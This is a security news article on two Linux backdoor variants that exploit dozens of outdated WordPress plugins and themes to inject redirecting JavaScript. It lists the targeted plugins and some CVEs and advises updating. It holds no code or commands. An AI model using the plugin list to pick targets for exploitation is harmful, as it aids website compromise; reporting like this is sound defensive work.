A new Linux malware strain is making the rounds on WordPress-based websites, seeking to exploit 30 known vulnerabilities in several outdated WordPress plugins and themes. Dubbed Linux.BackDoor.WordPressExploit.1, the malware injects malicious JavaScript into target websites.
Once again, the importance of timely updates has become evident. According to Dr. Web, which discovered Linux.BackDoor.WordPressExploit.1, the trojanized malware attempts to hack into websites through 30 outdated and vulnerable plugins or themes, including WooCommerce, WP Live Chat Support Plugin, Google Code Inserter, and more (listed below).
Once the remote-controlled trojan confirms a website uses any vulnerable plugin, it acts as a backdoor to push malicious JavaScript it fetches from its command and control (C2) server into the website.
“If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server. With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first — regardless of the original contents of the page,” Dr. Web noted.
And when a user lands and clicks anywhere on an infected website, they are redirected to the website of the attackers’ choice, where they may be served malvertising, prompted to download malware, or can be targeted in phishing.
Linux.BackDoor.WordPressExploit.1 is developed with additional features, including switching to standby mode, shutting itself down, and pausing logging its actions. The malware is designed to target 32-bit versions of Linux but can also run on 64-bit versions.
In addition to Linux.BackDoor.WordPressExploit.1, Dr. Web also stumbled upon a variant of the same backdoor. The difference is that Linux.BackDoor.WordPressExploit.2 has a different C2 server address, a different domain address from where the malicious JavaScript is downloaded and targets 11 additional plugins.
See More: Malware Extension in PyPI Downloaded Over 2,300 Times
|
Plugins and Themes |
||
|
Targeted by Both Linux.BackDoor.WordPressExploit.1 and 2 |
Linux.BackDoor.WordPressExploit.2 | |
| WP Live Chat Support Plugin | WP Quick Booking Manager |
Brizy WordPress Plugin |
|
WordPress – Yuzo Related Posts |
Facebook Live Chat by Zotabox | FV Flowplayer Video Player |
| Yellow Pencil Visual Theme Customizer Plugin | Blog Designer WordPress Plugin |
WooCommerce |
|
Easysmtp |
WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233) | WordPress Coming Soon Page |
| WP GDPR Compliance Plugin | WP-Matomo Integration (WP-Piwik) |
WordPress theme OneTone |
|
Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972) |
WordPress ND Shortcodes For Visual Composer | Simple Fields WordPress Plugin |
| Thim Core | WP Live Chat |
WordPress Delucks SEO plugin |
|
Google Code Inserter |
Coming Soon Page and Maintenance Mode | Poll, Survey, Form & Quiz Maker by OpinionStage |
| Total Donations Plugin | Hybrid |
Social Metrics Tracker |
|
Post Custom Templates Lite |
WPeMatico RSS Feed Fetcher | |
|
Rich Reviews plugin |
||
“Both trojan variants have been found to contain unimplemented functionality for hacking the administrator accounts of targeted websites through a brute-force attack — by applying known logins and passwords, using special vocabularies. It is possible that this functionality was present in earlier modifications, or, conversely, that attackers plan to use it for future versions of this malware,” Dr. Web added.
The obvious mitigation is to update WordPress, plugging, themes and all relevant components. Dr. Web also recommends setting strong and unique logins and passwords.
Let us know if you enjoyed reading this news on LinkedIn, Twitter, or Facebook. We would love to hear from you!
Image source: Shutterstock
